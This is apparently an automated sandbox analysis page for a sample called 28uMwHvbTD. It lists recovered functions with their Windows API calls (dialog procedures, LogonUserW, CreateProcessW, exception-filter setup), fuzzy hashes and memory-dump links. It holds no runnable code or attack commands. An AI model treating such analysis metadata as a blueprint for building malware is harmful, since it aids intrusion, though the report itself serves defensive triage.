Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5cadebd90fc2fbabad9aa6d12599aae8107fc19f19ba3a26e7c1118e6dba045
Instruction ID: 7297c15e564518dc7ece340e0b0f606cf912639d842b0b0ac81fd481c79f6e08
Opcode Fuzzy Hash: a5cadebd90fc2fbabad9aa6d12599aae8107fc19f19ba3a26e7c1118e6dba045
Instruction Fuzzy Hash: 05320162D2AF414DD7279634E822336A359AFB73C4F14D737EC1AB59A6EB2CD4834100

Function 0077242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2f14b989d895f1311f04826bd12e6934cfd733a47e13ff5eae4593b2f757809
Instruction ID: 286df9f3531a0d7bd6b1dae76133aef9c3f46dddbda9500804b45b3cc18796e4
Opcode Fuzzy Hash: b2f14b989d895f1311f04826bd12e6934cfd733a47e13ff5eae4593b2f757809
Instruction Fuzzy Hash: 33B1ED20E2AF414DD62396398831336BB6CBFBB2C5F52D71BFC6A74D22EB2585834145

Function 007A8889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 007A889B

Part of subcall function 0076520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,007A8F6E,00000000,?,?,?,?,007A911F,00000000,?), ref: 00765213
Part of subcall function 0076520A: __aulldiv.LIBCMT ref: 00765233

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: b266ce1b5f93eaad729c4ec714afb950569eef8b1a3ff1014ebc989bcd71548d
Instruction ID: bc0ebe198a6131161734ae5afcd780907ce448c498b1610d72f09b1e0473926a
Opcode Fuzzy Hash: b266ce1b5f93eaad729c4ec714afb950569eef8b1a3ff1014ebc989bcd71548d
Instruction Fuzzy Hash: EF219D726356108BC769CF29D841A52B3E1EBA5311B688E6CE1E5CB2C0DA38A915CB54

Function 007CD78C Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 007CD838

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 9a546dd521ae717e6241dc7119ba8259240e65b05b6866456bfe1098d3600035
Instruction ID: 12472dcc1751a3388a453acfc69598026989536a662dfa6fa691726971b9a6b4
Opcode Fuzzy Hash: 9a546dd521ae717e6241dc7119ba8259240e65b05b6866456bfe1098d3600035
Instruction Fuzzy Hash: 3311E734204615FBEB355A2CCD4AF7A3754D741B20F24833CF9125A5E2CA7C9D1093A5

Function 007CD3B8 Relevance: 1.5, APIs: 1, Instructions: 47nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007425DB: GetWindowLongW.USER32(?,000000EB), ref: 007425EC

NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,0077B952,?,?,?,?,00000000,?), ref: 007CD432

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: d9b3635c3f702dae78d4f41b53dd2b0749738bb93b263e944cd744705385b619
Instruction ID: d4e1c00b638b692c09084c300b0a9c26da972d13004f5f8349a783a7a6bd99b7
Opcode Fuzzy Hash: d9b3635c3f702dae78d4f41b53dd2b0749738bb93b263e944cd744705385b619
Instruction Fuzzy Hash: 2B01F531600094ABDB288E24C889FBA3B92EF46321F44413CFE165B191C338BD2297A0

Function 0074189B Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00741B04,?,?,?,?,?), ref: 007418E2

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 81d970a29482f378e20f2fceb14154e371dc923143241d6d015471e489d6457a
Instruction ID: f781292610cccee6c52429d829d74fe68bcd6ac785f1eb6069a0f325795a4c38
Opcode Fuzzy Hash: 81d970a29482f378e20f2fceb14154e371dc923143241d6d015471e489d6457a
Instruction Fuzzy Hash: 39F05E34600615DFDB18EF14D854A7737A6FB54360F908129F9528B2A1DB35D8A0EB60

Function 007CC8BE Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 007CC8FE

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 20b64709efa23afc265aeb6f25235bf3cfd4cf7ca6499d1d74d18f894b3e22c7
Instruction ID: b3a518ccdef422865b820c8bd57ecdb24214700dbf1ceb2f37660b26d10b6e83
Opcode Fuzzy Hash: 20b64709efa23afc265aeb6f25235bf3cfd4cf7ca6499d1d74d18f894b3e22c7
Instruction Fuzzy Hash: C2F06D35240658EFDB21DF58DC49FD73B95EB09320F04801CFA15672E2CB746820EBA4

Function 007987B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00798389), ref: 007987D1

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 357a6effc7837a37eddde82521b948638138efe51363f29d99ebfb578964914b
Instruction ID: e2be0ad7fb59c89ef222d8d3311767c868aa6837693dbdf2b5da42aad3d75db4
Opcode Fuzzy Hash: 357a6effc7837a37eddde82521b948638138efe51363f29d99ebfb578964914b
Instruction Fuzzy Hash: 48D05E3226090EABEF018EA4DC01EAE3B6AEB04B01F408111FE15C50A1C775D835AB60

Function 007CC909 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0077B9BC,?,?,?,?,?,?), ref: 007CC934

Part of subcall function 007CB635: _memset.LIBCMT ref: 007CB644
Part of subcall function 007CB635: _memset.LIBCMT ref: 007CB653
Part of subcall function 007CB635: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00806F20,00806F64), ref: 007CB682
Part of subcall function 007CB635: CloseHandle.KERNEL32 ref: 007CB694

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
String ID:
API String ID: 2364484715-0
Opcode ID: bdcb2e06fdad0dc536894f437079f3579ce86d704dbd2f065707530ca6d49b56
Instruction ID: de8a24d6cb477a3014106794918702a74057ffce005f1a6b11decc5ca49449fe
Opcode Fuzzy Hash: bdcb2e06fdad0dc536894f437079f3579ce86d704dbd2f065707530ca6d49b56
Instruction Fuzzy Hash: 91E0B635110208EFCB02AF44ED55E9637B6FB1C315F018069FA09572B2C735AD60EF54

Function 0074167D Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00741AEE,?,?,?), ref: 007416AB

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: b6ac2ae21cc6b34515af607e504f4757b0753fe44ccbb0b6937b559d1624af36
Instruction ID: 70db81f44fed1f09a3cd620a3ec9e7d658ccaaf94b14dcc0d189a5dc70875fa4
Opcode Fuzzy Hash: b6ac2ae21cc6b34515af607e504f4757b0753fe44ccbb0b6937b559d1624af36
Instruction Fuzzy Hash: 81E0EC35240208FBCF45AF90DC19E663B2AFB48310F508468FA454A2A2CB36A522EB64

Function 007CC860 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL ref: 007CC885

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: e38b9400a630e3e25430f416c978d5ac2e7640e2ce2545a94fe557ac6a6586cc
Instruction ID: 388b470dfbb12b10b85abee15adcb6dab656d0da1a3c5b91a8cba2519ddc78d4
Opcode Fuzzy Hash: e38b9400a630e3e25430f416c978d5ac2e7640e2ce2545a94fe557ac6a6586cc
Instruction Fuzzy Hash: B1E0E235240208EFCB01DF88E888E863BA5BB1D300F008064FE0547262C771A830EB61

Function 007CC88F Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL ref: 007CC8B4

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 7304776e33a3a3ef5c7ee5857259d53a0ad831f12c618f30fa6e333ce68aa64b
Instruction ID: 31084c43f03a4d2fa1676ddff4247eed550fa71f0872bc994bc63fccfe8d6ea6
Opcode Fuzzy Hash: 7304776e33a3a3ef5c7ee5857259d53a0ad831f12c618f30fa6e333ce68aa64b
Instruction Fuzzy Hash: 60E04275250249EFDB01DF88E949D963BA5BB1D700F418064FE1547262C771A870EBA5

Function 007416B5 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

Part of subcall function 0074201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007420D3
Part of subcall function 0074201B: KillTimer.USER32(-00000001,?,?,?,?,007416CB,00000000,?,?,00741AE2,?,?), ref: 0074216E

NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00741AE2,?,?), ref: 007416D4

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Window$DestroyDialogKillLongNtdllProc_Timer
String ID:
API String ID: 2797419724-0
Opcode ID: edcf082decc79d25084808a331ea3ec30fbfb105e0f7baf2dd572bcc81af94d2
Instruction ID: 7edf46677d832846121c76577c1bc458900783b68472e3fa4d58111a6bffc4cb
Opcode Fuzzy Hash: edcf082decc79d25084808a331ea3ec30fbfb105e0f7baf2dd572bcc81af94d2
Instruction Fuzzy Hash: 2BD01230280308F7DA102B90DC1FF6A3B19DB14750F80C020FB04691E3CB766831A569

Function 0076A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0076A12A

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 51a064a635f18a7d01f06f8ac7eeb017e60e8e2b6eb718a8223399692e5f06f4
Instruction ID: 9f88c066652b19e7cd74d727de051b5f95aaf155ca7fc1d7ab21dcda763b6cd7
Opcode Fuzzy Hash: 51a064a635f18a7d01f06f8ac7eeb017e60e8e2b6eb718a8223399692e5f06f4
Instruction Fuzzy Hash: 6AA0113000020CBB8A002B82EC08888BFAEEA802A0B008020F80C800228B32AA208A88

Function 00758808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b68568436947bdc28273e4203b0303b9b4f0af75d28175bffbd37e01272be08
Instruction ID: 969cae024776b3ae6901bf8f8b197f3870ddea16cb66f4deec3dc9fb46ca522a
Opcode Fuzzy Hash: 2b68568436947bdc28273e4203b0303b9b4f0af75d28175bffbd37e01272be08
Instruction Fuzzy Hash: 4D224730604556CBDF798B24D8947BC77A1FB01305F28806BDD96AB592EBBCAC89C743

Function 007621C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 67a472e04e38d8a118fdc3d283976f9ee8aca5cf55cc983c1b4760e9e317c870
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 18C195322055930ADFAD463A847403EFAA15EA27B135E075DDCB3CB5D6EF28C926D620

Function 007625FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 72fe62189e008fc2dd4496fa29622ed44ab47e05507615bf0069247eb3356db2
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: B2C196322055930ADFAD463AC43403EBAA15FA27B135E076DDCB3DB5D5EF18C925E620

Function 00761978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 0b44036c2bb15287b0ab1d655851284891c7968a2c9352e780b467a35da9c4bb
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: DBC18E3230919309DF6D463AC43813EBAA15EA27B139E476DDCB3DB5C4EF28C925D620

Function 012FEAE0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1396408167.00000000012FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 012FB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fb000_28uMwHvbTD.jbxd

Similarity

